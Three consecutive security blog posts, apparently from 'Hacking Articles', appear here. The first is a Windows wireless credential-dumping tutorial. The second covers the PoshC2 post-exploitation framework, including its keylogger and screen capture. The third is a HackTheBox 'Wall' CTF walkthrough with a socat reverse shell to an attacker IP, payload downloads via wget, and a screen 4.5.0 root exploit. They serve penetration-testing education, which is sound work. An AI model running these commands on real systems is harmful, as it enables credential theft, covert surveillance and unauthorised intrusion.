Credential Dumping: Wireless

Today we will be taking a look at how we can dump Wireless Credentials. We will cover Credential Dumping, Red Teaming, Different ways we can get those pesky wireless credentials.

Table of Content

·         What is Credential Dumping?

·         Credential Dumping in Real Life

·         Credential Dumping and Red Teaming

·         Credential Dumping Methods

o   netsh

o   WirelessKeyView

o   Wifi Network Properties

o   LaZagne

o   Mimikatz

o   Metasploit Framework

·         Mitigation

What is Credential Dumping?

When the term password cracking is used in the cyber world, it is being used as a broad concept as it shelters all the methods related to attacking/dumping/retrieving passwords of the victim/target. But today, in this article we will solely focus on a technique called Credential Dumping.

Credential dumping is said to be a technique through which username and passwords are extracted of any login account from the target system. It is this technique that allows an attacker to get credentials of multiple accounts from one person. And these credentials can be of anything such as a bank, email account, social media account, wireless networks.

Credential Dumping in Real Life

When an attacker has access to the target system and through that access, they successfully retrieve the whole bunch of their credentials. Once you are inside the target’s system, there are multiple methods to retrieve the credentials of a particular thing. For instance, to redeem all the names and passwords of the wireless networks to which the operating system has connected, there are various methods that an attacker can use and we will try and cover all of those methods here in our article. Now another thing to focus on is that this dumping of credentials can be done both in internal penetration testing and external penetration testing, it depends on the methodology, perspective or subjectivity of the attack on the bases of which the best suitable method can be decided.

Credential Dumping Methods

Just like the instance presented above, we will portray various methods to dump wireless credentials from a system in this article. So, let’s get started, shall we?

Manual Credential Dumping

All the Wi-Fi password with their respective SSID are stored in an XML file. The location of these files is C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***. Here, you will find that SSID of wifi is saved in clear text whereas passwords are stored as keys.

Credential Dumping using netsh

Netsh is a scripting utility provided by Microsoft itself. It can be used both in command prompt or Windows PowerShell. Netsh is short for network shell. When executed, it provides detailed information about the configuration of the network that the system ever had; including revealing the credentials of wireless networks that it has ever been connected to. This utility comes with various parameters that can be used to get various information as per the requirement. This method can be used both in internal and external penetration testing as netsh commands can be executed both locally and remotely.

To get the list of the SSIDs that the device has been connected to use the following command:

netsh wlan show profiles

And as a result of the above command, you can see the names of the Wi-Fi networks that the system was connected to in the past or present such as Meterpreter, Linuxlab, etc. The same has been demonstrated in the image above.

Further, to know the passwords of any one of the mentioned SSIDs use the following command :

netsh wlan show profile name= key=clear

And just like it is shown in the image above, the result of the above command will give you the password.

Credential Dumping using WirelessKeyView

A wireless key view is a simple software accesses the XML files where wireless passwords are stored and reveals them in cleartext. This tool was developed to recover lost and forgotten password of a wireless network. This is the perfect method for credential dumping in internal network penetration testing. To utilize this method simply download the tool from here and run it, you will get all the Wi-Fi names and its password as shown in the image below:

Credential Dumping using Wifi Network Properties

Our next method is manual, it is good when you are introduced to the network to work but for some reason, the password of the network isn’t revealed to you. Then you can use this method, as it falls under the category of internal penetration testing methodology. To reveal the password of a wireless network manually, go to Control Panel > Network and Internet > Network and Sharing Center and then click on Wi-Fi (*SSID*). A dialogue box will open, in that box click Wireless Properties button in the upper pane. Next, go to Security tab and you can see the password there just as it is shown in the image below:

Credential Dumping using LaZagne

LaZagne is an open-source tool that was developed to retrieve all the passwords stored in your machine. We have covered LaZagne in our other article, which you can read from here. In our experience, LaZagne is an amazing tool for credential dumping and its the best tool to be used for external penetration testing. To extract Wi-Fi password with LaZagne, simply download the tool from here and run it remotely using it following command :

lazagne.exe Wi-Fi

After running the above command, all the Wi-Fi-related passwords with their respective SSID will be extracted.

Credential Dumping using Mimikatz

Another method that can be very useful in external penetration testing is using Mimikatz. We have covered various features of Mimikatz in our other article, which you can find here. Once you have the victim’s session use the following commands to get the passwords:

getsystem

load kiwi

Wi-Fi_list_shared

And very easily you will have all the passwords at your service as shown in the image above.

Credential Dumping using Metasploit Framework

Then our next method is to use Metasploit to retrieving desired passwords. As all of us know that Metasploit is a framework that provides us with already constructed exploits to make pentesting convenient. And is an amazing platform for a beginner and expert in hacking pentesting world.

Now, to dump credentials there comes an in-built post exploit in the Metasploit and to run the said exploit; go to the terminal of Metasploit by typing msfconsole and get the session of you to the target system using any exploit you prefer. And then background the session use the post-exploit for extracting desired Wi-Fi credentials by using the following commands:

use post.windows.wlan/wlan_profile

set session 1

exploit

And just as it is shown in the image above, you will have your credentials.

Mitigation

There are various measures that you can follow in order to protect yourself from credential dumping attacks. These measures are given below:

·         Keep you employees/employers aware

·         DO NOT use default SSID of a wireless network

·         Do not save the passwords on the system

·         Always reconnect to a Wi-Fi manually.

·         Have a different network for guests

·         Use VPN

·         Change your Wi-Fi password regularly

·         Use a different IP address instead of the default one

·         Make sure your modems don’t have reset button as most of the modems come with the reset button. When the said button is pressed, it brings back the default settings which doesn't have any security layer and allows anyone to connect.

So, these were the methods to dump wireless credentials. Apply the suggested mitigation to your systems or networks in order to keep yourself safe from attackers. I hope these were useful and keep tuning in for various hacking techniques!

We are well aware these are tough times for everyone and, we, here at hacking articles hope and pray that everyone is safe and following the measure of self-quarantine. And for all the hacking/pen-testing enthusiasts we are working hard to bring more and more new content so that you can learn new things and use this self-isolation to its best. Stay Safe and take care! Happy Hacking!

Command & Control: PoshC2

Table of Content

·         Introduction

·         Features

·         Installation

·         Enumerate User Information

·         Enumerate Computer Information

·         Find All Vulnerabilities

·         Invoke ARP Scan

·         Get Key Strokes

·         Get Screenshot

Introduction

PoshC2 is an open-source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 primarily focuses on Windows implantation, it does contain a basic Python dropper for Linux/macOS.

Features of PoshC2

·         Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.

·         A large number of payloads generated out-of-the-box which are frequently updated and are maintained to bypass common Anti-Virus products.

·         Auto-generated Apache Rewrite rules for use in C2 proxy, protecting your C2 infrastructure and maintaining good operational security.

·         A modular format allowing users to create or edit C#, PowerShell or Python3 modules which are run in-memory by the Implants.

·         Notifications on receiving a successful Implant, such as via text message or Pushover.

·         A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history, and suggestions.

·         Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.

·         Client/Server format allowing multiple team members to utilize a single C2 server.

·         Extensive logging. Every action and response is timestamped and stored in a database with all relevant information such as user, host, implant number, etc. In addition to this, the C2 server output is directly logged to a separate file.

·         Support for Docker, allowing reliable and cross-platform execution

Installation of PoshC2

We can install PoshC2 automatically for Python3 using the curl command. We need an elevated shell to execute this command successfully.

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash

Now that we have installed the PoshC2 from the Github, we need to configure the listener to our IP Address. This can be done by editing the config file using the following command.

posh-config

After the required configurations are done, we need to open 2 instances of the terminals. Running the server and the handler. We need to run the Implant Handler, used to issue commands to the server and implants.

posh

Further, we will run the server which will communicate with the Implants and receive task output.

posh-server

You can use any one of the methods to gain a session from the ones that are depicted in the image above. Know that, as soon as we run the payload on the target machine. It activates an implant in the Implant handler as shown in the image given below.

Enumerate User Information

Now that we have an active implant in our Posh, It's time to run some inbuilt modules to get some information about the Target System. We are going to start with the User Information, Group Information. This module dumps all the local users, local groups and their membership on the Target Machine. It gathers all the information using the WMI. To initiate this module, we will be using the following command:

get-userinfo

After working a while on the implant, we see that it has successfully enumerated all the user-related information from the target machine. We have information about the local users, local groups, number of local groups.

Enumerate Computer Information

As we already enumerated the user's information, now its time to get the information about the system. For this, we will use this implant. It is an external implant that is integrated with Posh C2. This is a Windows Powershell Script that runs in the background by the same name. It uses the PSInfo from the Sysinternals to gain the information regarding the Computer Name, Domain, Operating System, OS Architecture and much more.

get-computerinfo

After working for a while on the implant, we see that it has successfully enumerated a lot of System related information from the target machine.

Find All Vulnerabilities

Now, comes the automated implant. This implant enumerates the target machine for a huge range of Local Privilege Escalation methods. It works quite similar to Windows Exploit Suggester. This is another Powershell script just like the previous implant that has been integrated into PoshC2. We can invoke this implant using the command given below:

find-allvulns

After working for a while on the implant, we can see that it has successfully enumerated all the possible exploits that can be used to elevate privileges on this machine.

Invoke ARP Scan

We can perform an arp-scan on the implant. This is based on the Powershell ArpScanner and uses C# AssemblyLoad. This scan deploys [DllImport(“iphlpapi.dll”, ExactSpelling=true)] to Export ‘SendARP’; by default, it will loop through all interfaces and perform an arp-scan of the local network based on the IP Address and Subnet mask provided by the network adapter. It can be invoked as shown in the image given below:

invoke-arpscan

Here, we can see that the arp-scan module has worked successfully giving us a list of IP Addresses that are in the same network as the target implant.

Get Key Strokes

Now, we will be trying to sniff out some keystrokes from our target implant. This can be done using the get-keystrokes module. This process is divided into 2 parts. First, we shall initiate the capturing and then we will read the captured keystrokes. Although this is an external module initially created in PowerShellMafia, it has changed the function to be in memory and not touch disk. We start capturing the keystrokes using the following command:

get-keystrokes

By default, the keylogger will run for 60 minutes. It has started the sniffing out the keystrokes as shown in the image given below:

Now to read those keystrokes, we need to run the following command:

Get-KeystrokeData

This will show us all the keystrokes that have been performed by the target implant. This is better than other methods to sniff keystrokes because it also shows the function keys like Ctrl and Shifts key entries which can be quite helpful in some scenarios.

Get Screenshot

Now it’s time to get a look at our target's system. This can be achieved using the get-screenshot module. This is a pretty straight forward method. We will initiate an implant that will help us get screenshots of the screen that is being used by the target at the time. This module is pretty useful as it helps is to get evidence or directly look at what the target is doing by capturing the live screen. You can initiate this module by using the following command:

get-screenshot

As you can see in the following image, the above command has been executed successfully and we have captured the live screen of the target.

Just like it has been mentioned in the above image, you can navigate to the location of the screenshot and access the screen of the target. The screenshot captured by us is shown below:

Hack the Box: Wall Walkthrough

Today we are going to crack a machine called Wall. It was created by aksar. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let's get cracking!!

Penetration Testing Methodology

·         Network Scanning

o   Nmap

·         Enumeration

o   Browsing HTTP Service at port 80

o   Directory Bruteforce using DirBuster

o   Bypass Authentication using Verb Tampering

o   Bruteforcing using hydra

·         Exploitation

o   Detect Remote Command Execution

o   Invoke Reverse Shell using RCE

·         Privilege Escalation

o   Downloading Screen 4.5.0 Exploit

o   Crafting the Payload

o   Compiling the Payload

o   Transferring the Payload

o   Getting Root Shell

·         Reading Root Flag

Walkthrough

Network Scanning

To Attack any machine, we need the IP Address. Machines hosted on HackTheBox have a static IP Address.

IP Address: 10.10.10.157

Now that we have the IP Address, We need to enumerate open ports on the machine. For this, we will be running a nmap scan. To get the most information and fast, we ran the Aggressive Scan.

nmap -A 10.10.10.157

The Nmap Aggressive scan quickly gave us some great information. It positively informed that the following ports and services are running 22 (SSH), 80(HTTP). Let's move on to Enumeration Stage.

Enumeration

Let's start with the Port 80. We ran the browser and opened the IP Address of the Machine. It gave us a default Debian Apache is Working Page.

http://10.10.10.157

Its time to do some directory bruteforce on our target. Generally, we use the dirb tool but let's show some love to DirBuster sometimes as well. Usage is pretty straight-forward. Enter the Target URL, locate the dictionary you want to use for the bruteforce. Here, in this case, we will be using the medium.txt. It can be found in Kali Linux by default. After everything is set, just click Start and kickback.

After working for a while, it gave us one directory called monitoring, Felt to take a look at it.

So, we entered the URL in the Browser and we have ourselves a Login Panel. This is no fun. It does say that "Protected area by the admin". So we get that username is admin. Easy Part is done. Now, all we got to do is get through this panel.

After trying a bunch of bruteforce techniques, we were not able to get through his login panel. That's when it hit us, we should try HTTP Verb Tampering. So, we fired up our BurpSuite and captured the request of the /monitoring/ page.

As we observed that there is a GET request being sent to the server. We decided to tamper with it and we changed it to POST. After making this change, we forwarded the request to the server.

Verb Tampering worked and we were redirected to the /centreon/ page. Here we have another Login Form. How lucky! Now we need to bypass this as well.

We tried to bruteforce it using Burpsuite but we were unsuccessful. Then we took a closer look at the source code of the page and found a centreon token that was preventing us from brute-forcing. Then we ran a directory bruteforce on this page. It gave us /api/ page. So we decided to bruteforce the API for the credentials. We looked for the API documentation for Centreon (https://documentation.centreon.com/docs/centreon/en/latest/api/api_rest/index.html) to find the query that can be brute-forced, In the API documentation, we are told to send a POST request to the API. When we did so, we got the message "Bad Credentials". So we gained enough information for crafting a bruteforce query. We crafted this query to bruteforce with the Hydra Tool.

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.157 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad Credentials" -V

Here, we started by giving the username "admin". We got this from the initial login panel. Then we provided the wordlist for bruteforce. Next, we gave the target IP address. Then we provided the type of authentication panel, which is "http-post-form". Followed by the URL and usernames and password parameters and the response text that could be used to differentiate the valid and invalid credentials. This gave us the credentials: Username: admin Password: password1

Now, this panel which we got was not something that we are used to working every day. But being in the penetration testing business we are sure to check out the CVEs for any panel, software or CMS. We did our research and found CVE-2019-17501 https://www.cvedetails.com/cve/CVE-2019-17501/. There was a GitHub link mentioned in the description of this CVE. We browsed it to find ourselves a PoC. On a closer look, the PoC contained a path.

http://ip-address/centreon/main.php?p=60807&type=4

We entered that URL in our Browser. Here we found an Add a Command Form. This contained the Command Input Field. We entered "cat /etc/passwd" here to check if RCE is working. After entering the command we hit that Blue Play button (Highlighted in the Image). This resulted in the opening of a new window with the result of the command we entered. RCE is indeed working. Now let's get a shell form here.

We decided to use a socat reverse shell. We edited our attacker IP Address into the one-liner and then entered it into the field. Then we clicked the Blue Play button that we used previously for the command to get executed. Before this, we start a netcat listener on the port that we mentioned in this one-liner.

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.10:1234

As soon as the command gets executed, we have a shell in the lister we started. Now as a part of our Post Exploitation tasks, we decided to use the find command to look for the SUID files. We found the screen-4.5.0. file as shown in the image given below.

nc -lvp

find / -perm -u=s -type f 2>/dev/null

Now we used the searchsploit command to look for the exploit for the screen-4.5.0. We see that we have the exploit by the name 41154.sh. We download this exploit to our attacker machine via searchsploit.

searchsploit screen 4.5.0

searchsploit -m 41154

cat 41145.sh

Now, we read the script. It divides itself into 3 files.

File #1: libhax.c

File #2: rootshell.c

File #3: 41154.sh

Each of them consisting the following code. You can download these files from our GitHub.

Now we need to compile the c files to get the object code. We will be using the gcc to compile this file.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

python -m SimpleHTTPServer

After compiling the code we ran a python one-liner to transfer the payload files.

We went back to the session that we have of the target system and downloaded the payload files onto the machine using wget command.

wget http://10.10.14.10:8000/41154.sh

wget http://10.10.14.10:8000/libhax.so

wget http://10.10.14.10:8000/rootshell

Now, if we read the initial sh files, we know that we need to perform some configurations before actually running the payload.

cd /etc

umask 000

screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"

/bin/screen-4.5.0 -ls

After these configurations, we ran payload. This gave us a root shell. This can be confirmed using the whoami command. We traverse into the /root directory. Here we found the root flag.

/tmp/rootshell

whoami

cd /root

ls

cat root.txt

This concludes this machine. This was a pretty lab. We got to use the Screen 4.5.0 privilege escalation technique after quite some time.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. I am writing this article while Working from home. Take care and be Healthy!